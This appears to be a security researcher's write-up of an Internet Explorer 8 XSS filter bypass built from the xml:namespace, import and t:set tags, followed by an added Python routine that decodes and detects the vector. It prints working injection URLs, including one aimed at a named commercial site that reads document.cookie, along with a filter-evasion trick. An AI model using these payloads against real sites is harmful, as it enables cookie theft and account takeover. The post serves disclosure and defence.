Note: IE 10 has fixed this issue, and IE8 ...
-------------------------------------------------
1. A <?import ... > tag can also be written as an <import ...> tag.

    <html>
    <body>
    <div>
      <div id="x">x</div>
      <xml:namespace prefix="t">
      <import namespace="t" implementation="#default#time2">
      <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror=alert(1)>">
    </div>
    </body>
    </html>

The code above executes the script fragment contained in the "to" attribute: the <t:set> element writes that value into the innerHTML of the element with id "x".
Furthermore, we found that this XSS vector, constructed from the three tags (<xml:namespace>, <import> and <t:set ...>), can bypass the IE8 XSS filter.
------------------------------------------------
POC1: using <import ...>
http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>
Using <?import ...> instead triggers the XSS filter, which intercepts our code.
2. When the injection point is inside an attribute value, as in <input type="text" value="{parameter under our control}">, our code has to start with ">. The "> sequence triggers the XSS filter, which then replaces some words such as 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa) (@Sogili on Wooyun.org) gave me a trick to solve the problem: "x> (where x is any letter) does not trigger the filter.
-------------------------------------------------
POC2:
http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>
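As an added example (not part of the original post), the following shows why a filter that inspects the raw request misses this vector and what a defending-side check has to do first: it URL-decodes the to= value of POC1 above, resolves the character references the way IE does (keeping &#11; as a vertical tab and then treating it as whitespace), and only then looks for a tag carrying an event handler. The character-reference decoder is written by hand because Python's html.unescape drops &#11; as an invalid reference; the function names and the two regexes are my own.

```python
import re
from urllib.parse import unquote

# Character references as a lenient parser resolves them. html.unescape is not
# used because it drops &#11; (invalid under HTML5), while IE8 resolved it to
# a vertical tab and accepted that as whitespace between attribute tokens.
_CHARREF = re.compile(r"&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));", re.I)
_NAMED = {"lt": "<", "gt": ">", "amp": "&", "quot": '"', "apos": "'"}
# Control characters the page's POCs rely on as token separators.
_ODD_WS = re.compile(r"[\t\n\x0b\x0c\r]+")
# What must never reach innerHTML from an attribute value: a tag together
# with an inline event handler.
_TAG_RE = re.compile(r"<\s*[a-z][a-z0-9]*", re.I)
_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)


def decode_charrefs(text: str) -> str:
    """Resolve &lt; &#11; &#x28; etc. to the characters the browser sees."""
    def repl(m):
        if m.group(1) or m.group(2):
            cp = int(m.group(1), 16) if m.group(1) else int(m.group(2))
            return chr(cp) if cp <= 0x10FFFF else "\ufffd"
        return _NAMED.get(m.group(3).lower(), m.group(0))
    return _CHARREF.sub(repl, text)


def normalize(raw: str) -> str:
    """URL-decode, resolve character references, then fold the control
    characters into one space so 'onerror\\x0b=' reads as 'onerror ='."""
    return _ODD_WS.sub(" ", decode_charrefs(unquote(raw)))


def attribute_value_contains_markup(raw: str) -> bool:
    """True when the decoded value carries a tag with an event handler."""
    text = normalize(raw)
    return bool(_TAG_RE.search(text) and _HANDLER_RE.search(text))


# The to= value from POC1 above, copied as it appears in the URL (constructed input).
POC1_TO_VALUE = ("%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;"
                 "=alert%26%23x28;1%26%23x29;%26gt;")

if __name__ == "__main__":
    print(normalize(POC1_TO_VALUE))                        # <img src=x:x onerror =alert(1)>
    print(attribute_value_contains_markup(POC1_TO_VALUE))  # True
```

The raw value contains neither "<img" nor "onerror=", which is exactly why a pattern match on the undecoded request lets it through.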
That's all. Thanks to my friend jackmasa (@Sogili on Wooyun.org) for his help.
Author: Gainover
Group: PKAV .net & Wooyun.org